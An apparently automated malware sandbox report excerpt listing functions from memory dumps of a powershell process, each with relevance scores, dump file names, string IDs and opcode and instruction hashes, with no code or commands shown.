                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$84rl$84rl$TQjq$TQjq$TQjq$tPeq$tPeq$$eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-831370120
                                                                                                                                                                            • Opcode ID: c243d8e1c91087b35acfdc219491e9bd9239ad5d76fc0662943eb88f86f0c012
                                                                                                                                                                            • Instruction ID: 9ecab551a8744f12852d440364d560e149c6f25552b22c34eba54cb1662a152f
                                                                                                                                                                            • Opcode Fuzzy Hash: c243d8e1c91087b35acfdc219491e9bd9239ad5d76fc0662943eb88f86f0c012
                                                                                                                                                                            • Instruction Fuzzy Hash: D481D1B1B1010ADFCB65CE68C5046AB7BF2FF85711F588469E8169B381CB72DC92C7A1
                                                                                                                                                                            Function 0764E910 Relevance: 14.0, Strings: 11, Instructions: 224COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$84rl$84rl$d%kq$d%kq$d%kq$d%kq$tPeq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-2166827768
                                                                                                                                                                            • Opcode ID: 1390c3237d65c228485e3c6de53b172d57b642f65d6d27e5a4329b021fc290ee
                                                                                                                                                                            • Instruction ID: c8d2e2a28b27e33828093b2b50d39a43fab53eff25344461edfcef2467718dc9
                                                                                                                                                                            • Opcode Fuzzy Hash: 1390c3237d65c228485e3c6de53b172d57b642f65d6d27e5a4329b021fc290ee
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D71E8B2B10216DFCB249F69C955A6ABBA3FF84310F148169D8039B391CB37DD81C7A1
                                                                                                                                                                            Function 07641020 Relevance: 11.7, Strings: 9, Instructions: 457COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$4'eq$4'eq$tPeq$tPeq$tPeq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-2390128903
                                                                                                                                                                            • Opcode ID: 58746b74276de7c5fd24ea0d8148f5b56b7d50cf1476aaefffaf225efe03719a
                                                                                                                                                                            • Instruction ID: e4602218339b0f40b4b17a7f2b30df1f60c89eecb11284f0307cb9b3d1a2a8c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 58746b74276de7c5fd24ea0d8148f5b56b7d50cf1476aaefffaf225efe03719a
                                                                                                                                                                            • Instruction Fuzzy Hash: 51E117B1B0435ECFCB2A9B79C4057ABBBE2AF83610F14806AD506CB795DA31C9C1C791
                                                                                                                                                                            Function 076416D0 Relevance: 11.5, Strings: 9, Instructions: 263COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$jl$jl
                                                                                                                                                                            • API String ID: 0-3455636258
                                                                                                                                                                            • Opcode ID: 8e549e012b6efe60f091693f448c71d41e29673a0d95e3a1a153f18a9397d2ee
                                                                                                                                                                            • Instruction ID: 0eb7009d9945be7e4141817c01d99e2bbda9d558c438f2dd55df0c59d223f4a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e549e012b6efe60f091693f448c71d41e29673a0d95e3a1a153f18a9397d2ee
                                                                                                                                                                            • Instruction Fuzzy Hash: 588128B27142198FCB299E78980166BBBE3EFC3620F14806AD456CB751DB31CD82C7A1
                                                                                                                                                                            Function 0764F16A Relevance: 11.5, Strings: 9, Instructions: 205COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$84rl$84rl$tPeq$tPeq$$eq$(kq$(kq$(kq
                                                                                                                                                                            • API String ID: 0-1626667988
                                                                                                                                                                            • Opcode ID: 65391d9a04846031da830891f88b6c3753cdb8d66be288959564ca8c2c488eed
                                                                                                                                                                            • Instruction ID: e45cf3b3dfc6cd8a27bb50636abb5257cdcb37814efdd7d8e24a13cb79bdbbec
                                                                                                                                                                            • Opcode Fuzzy Hash: 65391d9a04846031da830891f88b6c3753cdb8d66be288959564ca8c2c488eed
                                                                                                                                                                            • Instruction Fuzzy Hash: 7771B8B0A11205DFDB25CE64C544BEABBB2AF45310F1D8096E8069B391CB31DD45CBA1
                                                                                                                                                                            Function 07642888 Relevance: 10.4, Strings: 8, Instructions: 394COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Tdk$4'eq$4'eq$4'eq$4'eq$DUdk$XYtl$XYtl
                                                                                                                                                                            • API String ID: 0-719078150
                                                                                                                                                                            • Opcode ID: caf95fcb03fc087a7bab4a6282b3f2ac7c8f9c1891c68e513b2886a9b148923e
                                                                                                                                                                            • Instruction ID: 3771391d6481187c4615cd59753045bba99916df7d255a08bdbc852ba5ffb6ae
                                                                                                                                                                            • Opcode Fuzzy Hash: caf95fcb03fc087a7bab4a6282b3f2ac7c8f9c1891c68e513b2886a9b148923e
                                                                                                                                                                            • Instruction Fuzzy Hash: D2D1E6B2B04206CFCB659F79856566ABBA2FFC5220F34C0AAE406CB755DB31CD81C761
                                                                                                                                                                            Function 08F91330 Relevance: 10.4, Strings: 8, Instructions: 385COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$84rl$84rl$tPeq$tPeq$tPeq$tPeq
                                                                                                                                                                            • API String ID: 0-249424520
                                                                                                                                                                            • Opcode ID: 20e3c38fb18c3579ead4f0cae974cfd8f75bba1b21bdfa25966d9b28e4a65a8c
                                                                                                                                                                            • Instruction ID: 2bdc393bd6e37ead9d62a539feb27dfd584e46be35b412740f4c3b7ce5b03ef8
                                                                                                                                                                            • Opcode Fuzzy Hash: 20e3c38fb18c3579ead4f0cae974cfd8f75bba1b21bdfa25966d9b28e4a65a8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D1F471F002159FDB159F78C401A6ABBA2EFC9311F25846EE9469B381DB35DC82CBA1
                                                                                                                                                                            Function 08F937D2 Relevance: 10.3, Strings: 8, Instructions: 324COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$84rl$84rl$tPeq$tPeq$tPeq$tPeq
                                                                                                                                                                            • API String ID: 0-249424520
                                                                                                                                                                            • Opcode ID: b3171773c8c9c6b4961ff921f74c54252bd987b4bbcb40b8acb2b3ad4deada01
                                                                                                                                                                            • Instruction ID: a822f6b7ddc1189f1bf3965c8f8ead8c2d94d9d8584c1861bec0d3bc85228592
                                                                                                                                                                            • Opcode Fuzzy Hash: b3171773c8c9c6b4961ff921f74c54252bd987b4bbcb40b8acb2b3ad4deada01
                                                                                                                                                                            • Instruction Fuzzy Hash: AEC1DFB6F00218DFDF549F68C441AAABBE2FF88321F658459E8919B381CB31DD41CB91
                                                                                                                                                                            Function 0764AAD0 Relevance: 10.3, Strings: 8, Instructions: 315COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-3121479685
                                                                                                                                                                            • Opcode ID: 766ce33f953278df7e3b368711bca36ddf970668d00f81e41f2cf0909822aa28
                                                                                                                                                                            • Instruction ID: b4d6edbcb8e00a145af99347af55bd2bedf0585a3541c6878bea27c7fe451ba4
                                                                                                                                                                            • Opcode Fuzzy Hash: 766ce33f953278df7e3b368711bca36ddf970668d00f81e41f2cf0909822aa28
                                                                                                                                                                            • Instruction Fuzzy Hash: EDA105F1B44207EFCB659EF9854166BBBE2AF85210B14C07AD417CB392DB31C941DBA1
                                                                                                                                                                            Function 0764FC04 Relevance: 10.2, Strings: 8, Instructions: 207COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$XRjq$XRjq$XRjq$tPeq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-3991462700
                                                                                                                                                                            • Opcode ID: e1e904e646a571bd2fd3dafcd54aa832d711cfb180447642d6f123b18acc8214
                                                                                                                                                                            • Instruction ID: 9d73fcb22dac70350dba37cd0b6cd4ea5ceb092338a700d0048f547027a11d16
                                                                                                                                                                            • Opcode Fuzzy Hash: e1e904e646a571bd2fd3dafcd54aa832d711cfb180447642d6f123b18acc8214
                                                                                                                                                                            • Instruction Fuzzy Hash: AF71C8B1B001059FCF249F69D404AEABBE2EF89711F18C469E8169F395CB31DD42CBA1
                                                                                                                                                                            Function 0764EE1A Relevance: 10.2, Strings: 8, Instructions: 168COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$84rl$TQjq$TQjq$tPeq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-1750033891
                                                                                                                                                                            • Opcode ID: 927e5286bb6e86f60bf85e7ef9ee0f28b89dc0adbc2f926e702916ef7ca2754e
                                                                                                                                                                            • Instruction ID: dfad678a82ed0ecfbad5af449c068b5648b0e230a1cd0d21fc4323358da1c09d
                                                                                                                                                                            • Opcode Fuzzy Hash: 927e5286bb6e86f60bf85e7ef9ee0f28b89dc0adbc2f926e702916ef7ca2754e
                                                                                                                                                                            • Instruction Fuzzy Hash: D651D4B0600206DFDB65CE24C5147A67BF2BF86711F5D80AAE8079B391C776DC85CBA2
                                                                                                                                                                            Function 0764F965 Relevance: 10.1, Strings: 8, Instructions: 145COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$84rl$84rl$tPeq$tPeq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2393823326
                                                                                                                                                                            • Opcode ID: b8e49461f5756035f1f4cb59814486dcf5bdd682f75fe74bf7b91072b4121b1c
                                                                                                                                                                            • Instruction ID: 46d6443a2d6ca96e4cd1e22fba261b88b6846f84fb4956288782201e535a6fde
                                                                                                                                                                            • Opcode Fuzzy Hash: b8e49461f5756035f1f4cb59814486dcf5bdd682f75fe74bf7b91072b4121b1c
                                                                                                                                                                            • Instruction Fuzzy Hash: C35171B1B1010AEFDB25CF68C545BEB7BA2FB89350F298055E9026B785CB31DC81C7A1
                                                                                                                                                                            Function 08F90D60 Relevance: 10.1, Strings: 8, Instructions: 142COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: tPeq$tPeq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-1424912048
                                                                                                                                                                            • Opcode ID: 462b4ce2a01b0af53b25f69bb84dc7b78d36b2f8c1695f14f0b984684c5d288c
                                                                                                                                                                            • Instruction ID: 10e6a2f149fa184f9b5451a5f85fcdabe88d08349a47be330d6f8c34997cf965
                                                                                                                                                                            • Opcode Fuzzy Hash: 462b4ce2a01b0af53b25f69bb84dc7b78d36b2f8c1695f14f0b984684c5d288c
                                                                                                                                                                            • Instruction Fuzzy Hash: 42414772B00615CFEF659A7DD80096ABBF5AFC5212B14806FD885CB292CE31DC41C7A1
                                                                                                                                                                            Function 07640AE8 Relevance: 8.9, Strings: 7, Instructions: 179COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: tPeq$tPeq$$eq$$eq$$eq$jl$jl
                                                                                                                                                                            • API String ID: 0-26845198
                                                                                                                                                                            • Opcode ID: 6b6f7bc6718f674d3a9c87c886db2fd5886bb0cd5179b65c975637b5d6cb170a
                                                                                                                                                                            • Instruction ID: 9836f4d83cc60599dfbe3374f2e0a0d31697ccea00407fd53c9b54e63487814b
                                                                                                                                                                            • Opcode Fuzzy Hash: 6b6f7bc6718f674d3a9c87c886db2fd5886bb0cd5179b65c975637b5d6cb170a
                                                                                                                                                                            • Instruction Fuzzy Hash: 43513DB2304365CFC7655A79D400667BBE5EFC6624B2884EFD646CB392CA32CC41C7A5
                                                                                                                                                                            Function 0764E8F2 Relevance: 8.9, Strings: 7, Instructions: 160COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$84rl$d%kq$d%kq$d%kq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-1946441413
                                                                                                                                                                            • Opcode ID: 184b63abad7ae2157e93e7a3127320b9fa6b053f6df4a45a900e66e9e6f6d3dc
                                                                                                                                                                            • Instruction ID: 1c10dc162cf1b11c488423cf61c6d21a96f2ba8bbb49db27a7c6bfe7ee713f83
                                                                                                                                                                            • Opcode Fuzzy Hash: 184b63abad7ae2157e93e7a3127320b9fa6b053f6df4a45a900e66e9e6f6d3dc
                                                                                                                                                                            • Instruction Fuzzy Hash: D351C4F2A10216DFCB248F24CA45BAABBB2BF45350F188195E8039B791C737DD81CB61
                                                                                                                                                                            Function 08F90520 Relevance: 7.8, Strings: 6, Instructions: 312COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$Pi$Pi
                                                                                                                                                                            • API String ID: 0-205652726
                                                                                                                                                                            • Opcode ID: ad0152a1ee1f578a9cff7f39fabf4a0508ecab7dcefc1c5a0aeb45f53016ac0c
                                                                                                                                                                            • Instruction ID: ece63c7d594cafee5e539e32617d321fb72dbd044e62d62a61322c6aece4ae8f
                                                                                                                                                                            • Opcode Fuzzy Hash: ad0152a1ee1f578a9cff7f39fabf4a0508ecab7dcefc1c5a0aeb45f53016ac0c
                                                                                                                                                                            • Instruction Fuzzy Hash: B9C17DB4E00A04DFDB14DFA8C551AAABBB2AFC8311F24C169D8456B744DB32EC42CB91
                                                                                                                                                                            Function 07648988 Relevance: 7.7, Strings: 6, Instructions: 192COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (ftl$(ftl$(ftl$(ftl$Pi$Pi
                                                                                                                                                                            • API String ID: 0-205652726
                                                                                                                                                                            • Opcode ID: bea7788adbaab817f9096e09baf9b9042c13eca7dd95fa2978b33a1f2cc0afdb
                                                                                                                                                                            • Instruction ID: 361872121e61ace2e273a9ea8acc97f242d6ff2349e05fc72c15e2257b350313
                                                                                                                                                                            • Opcode Fuzzy Hash: bea7788adbaab817f9096e09baf9b9042c13eca7dd95fa2978b33a1f2cc0afdb
                                                                                                                                                                            • Instruction Fuzzy Hash: F27160F0E10206DFCB15DF68C551AAABBB2AF89314F14C069D806AF755CB72ED81CB91
                                                                                                                                                                            Function 0764EA36 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$84rl$d%kq$d%kq$d%kq$tPeq
                                                                                                                                                                            • API String ID: 0-407560531
                                                                                                                                                                            • Opcode ID: c580213d4d4919ec27d81046178638172e5fae84060975d8674e98c3ab7cc3a9
                                                                                                                                                                            • Instruction ID: 89ed52af29aa2dd8ae047fe8bf5d8313d4a509419d8ae08252bccb9813756cdf
                                                                                                                                                                            • Opcode Fuzzy Hash: c580213d4d4919ec27d81046178638172e5fae84060975d8674e98c3ab7cc3a9
                                                                                                                                                                            • Instruction Fuzzy Hash: 5031B6B1B00215DFC724DF68C544A6ABBA3FF49714F258195E8079B341C732EC41CB90
                                                                                                                                                                            Function 0764AF00 Relevance: 6.6, Strings: 5, Instructions: 349COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$4'eq$4'eq$$eq
                                                                                                                                                                            • API String ID: 0-471562182
                                                                                                                                                                            • Opcode ID: 64ca0848d4ade2572cfe056b336f3d1fea3d323c3dc24f6e8c413759e807bcf7
                                                                                                                                                                            • Instruction ID: 8fd7ce6083faff96a64068a4a46ce9ae7a9d99647f974915628b464f7ebc4810
                                                                                                                                                                            • Opcode Fuzzy Hash: 64ca0848d4ade2572cfe056b336f3d1fea3d323c3dc24f6e8c413759e807bcf7
                                                                                                                                                                            • Instruction Fuzzy Hash: 1BA1F1F1B04256DFCB169E78C4116BBBBF2AF96211F18C0AAD45ACB351DB31C982C791
                                                                                                                                                                            Function 07640CD8 Relevance: 6.5, Strings: 5, Instructions: 265COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$tPeq$tPeq$$dk
                                                                                                                                                                            • API String ID: 0-2308709311
                                                                                                                                                                            • Opcode ID: d65e361a280eaab2003f559c405fc77a58d1c530506275f0f0e2d9ba6937aac7
                                                                                                                                                                            • Instruction ID: c22bd41ab0c2b76017ae65ec2004b43bb93a1bd063e18dc62cc3fe7724b863dc
                                                                                                                                                                            • Opcode Fuzzy Hash: d65e361a280eaab2003f559c405fc77a58d1c530506275f0f0e2d9ba6937aac7
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E8137F1B1422A9FCF259A78840176BBBE2AF85310F18C4BAD607CB781DB31D945C7A1
                                                                                                                                                                            Function 0764B2E0 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2942138008
                                                                                                                                                                            • Opcode ID: 8193e10f6f79af38b1a842a389b47ba6975af0c16d8b512cbd94baf916fe868c
                                                                                                                                                                            • Instruction ID: e7799fec6a9fbd241abc30e8864bf452efbb28251943d2fa314d9a44e7fa8b38
                                                                                                                                                                            • Opcode Fuzzy Hash: 8193e10f6f79af38b1a842a389b47ba6975af0c16d8b512cbd94baf916fe868c
                                                                                                                                                                            • Instruction Fuzzy Hash: 827123F171421ADFCB259E79D4406AABBA2EF85310F14C06AE40F8B796DB31CD82C791
                                                                                                                                                                            Function 0764F5BD Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 84rl$84rl$tPeq$tPeq$$eq
                                                                                                                                                                            • API String ID: 0-1462105900
                                                                                                                                                                            • Opcode ID: 5e42f8285c68676a0d139b7214df51f81cfd075825e71674802cd247cb39c0e3
                                                                                                                                                                            • Instruction ID: a8d3c3d25a8a29772dd93351605bae38e6ffff6e9f7d12e6c42bdc89bf52ea45
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e42f8285c68676a0d139b7214df51f81cfd075825e71674802cd247cb39c0e3
                                                                                                                                                                            • Instruction Fuzzy Hash: D36108B1B001059FCB159F789445AEABBE2FF85710F28C069E416AF396CB35DD42CBA1
                                                                                                                                                                            Function 0764EC70 Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2942138008
                                                                                                                                                                            • Opcode ID: c1f3b7681dc9b0669dc7e834dfdeb02c5030030e1e01e11c7d13569824d68593
                                                                                                                                                                            • Instruction ID: 1278e190d7d7492b04cbeacd9ce922cf4580214a06217adf4fb2189e4455e02f
                                                                                                                                                                            • Opcode Fuzzy Hash: c1f3b7681dc9b0669dc7e834dfdeb02c5030030e1e01e11c7d13569824d68593
                                                                                                                                                                            • Instruction Fuzzy Hash: D84194B5B1021ACFCF258A79844067BBBE6FF85111F28807AD416C7385DB36C842CB61
                                                                                                                                                                            Function 07640538 Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2513450561.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7640000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                                                                                                            • API String ID: 0-2942138008
                                                                                                                                                                            • Opcode ID: a6094641c76bb1f2e979e5fab17cdad752b6094c1e5bf1d7eb2f693f13bfbd2c
                                                                                                                                                                            • Instruction ID: 1f51314e9210ded6ded58c65f03099aee3cb36a20ca1fd01f4aca9c1dd179705
                                                                                                                                                                            • Opcode Fuzzy Hash: a6094641c76bb1f2e979e5fab17cdad752b6094c1e5bf1d7eb2f693f13bfbd2c
                                                                                                                                                                            • Instruction Fuzzy Hash: D941A3F1B10226EFDF259E38C51167A7BA2EBC5210F1480AADA079B391DB32C942D791
                                                                                                                                                                            Function 08F90D5F Relevance: 6.3, Strings: 5, Instructions: 78COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.2521835092.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
